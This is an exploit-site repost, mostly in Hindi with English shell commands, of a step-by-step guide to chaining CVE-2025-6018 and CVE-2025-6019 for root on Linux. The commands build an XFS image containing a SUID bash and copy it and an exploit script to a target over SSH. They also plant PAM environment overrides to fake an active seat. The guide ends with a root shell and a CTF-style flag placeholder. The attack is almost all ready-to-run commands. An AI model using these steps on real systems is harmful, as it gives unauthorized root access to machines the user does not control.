Sploitus

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

kitploit · 2026-08-27

Exploit Code

MARKDOWN126 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MUYUANLOVE-CVE-2025-6018-CVE-2025-6019-PRIVILEGE-ESCALATION-EXPLOIT
# CVE-2025-6018 + CVE-2025-6019 विशेषाधिकार वृद्धि गाइड

中文

## 📋 त्वरित शोषण चरण

### चरण 1: XFS इमेज तैयार करें (स्थानीय मशीन)

root@kitploit:~
    
    
    # Create 300MB XFS image
    dd if=/dev/zero of=xfs.image bs=1M count=300
    mkfs.xfs -f xfs.image
    
    # Mount and install SUID bash
    mkdir mnt
    sudo mount -t xfs xfs.image mnt
    sudo cp /bin/bash mnt/bash
    sudo chmod 4755 mnt/bash
    sudo umount mnt
    rmdir mnt
    
    # Verify (should show 300M)
    ls -lh xfs.image
    

* * *

### चरण 2: टारगेट पर फ़ाइलें अपलोड करें

root@kitploit:~
    
    
    # Upload exploit script and image
    scp exp.sh some-email@example.com:~/
    scp xfs.image some-email@example.com:~/
    

* * *

### चरण 3: पहला लॉगिन - PAM कॉन्फ़िगर करें

root@kitploit:~
    
    
    # SSH login to target
    ssh some-email@example.com
    
    # Write PAM environment variables
    cat > ~/.pam_environment << 'EOF'
    XDG_SEAT OVERRIDE=seat0
    XDG_VTNR OVERRIDE=1
    EOF
    
    # Verify configuration
    cat ~/.pam_environment
    
    # 🔥 Critical: Logout (to activate PAM config)
    exit
    

* * *

### चरण 4: दूसरा लॉगिन - विशेषाधिकार वृद्धि निष्पादित करें

root@kitploit:~
    
    
    # Re-login via SSH (PAM config now active)
    ssh some-email@example.com
    
    # Verify PAM is active (should return "('yes',)")
    gdbus call --system --dest org.freedesktop.login1 \
        --object-path /org/freedesktop/login1 \
        --method org.freedesktop.login1.Manager.CanReboot
    
    # Execute privilege escalation script
    bash exp.sh
    

* * *

## ✅ सफलता संकेतक

यदि शोषण सफल होता है, तो आपको यह देखना चाहिए:

root@kitploit:~
    
    
    ✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
    ✓ Root access confirmed!
    
    ════════════════════════════════════════════════════════════
    ║ ROOT FLAG                                               ║
    ║ <flag_here>                                             ║
    ════════════════════════════════════════════════════════════
    
    bash-5.2# whoami
    root
    

* * *

## 🔧 समस्या निवारण

समस्या| समाधान  
---|---  
`CanReboot` लौटाता है  
  
* * *

## 📌 मुख्य बिंदु

  * ✅ **लॉगआउट और फिर से लॉगिन करना आवश्यक है** : PAM कॉन्फ़िग केवल नए सत्रों में प्रभावी होता है
  * ✅ **CanReboot सत्यापित करें** : स्क्रिप्ट चलाने से पहले पुष्टि करें कि यह `('yes',)` लौटाता है
  * ✅ **SSH लॉगिन का उपयोग करें** : `ssh -t user@host "cmd"` शैली निष्पादन का उपयोग न करें



* * *

## 🐱 बिल्ली संरक्षक

**यदि यह विफल होता है, तो सुनिश्चित करें कि हर चरण सख्ती से क्रम में निष्पादित किया गया है!**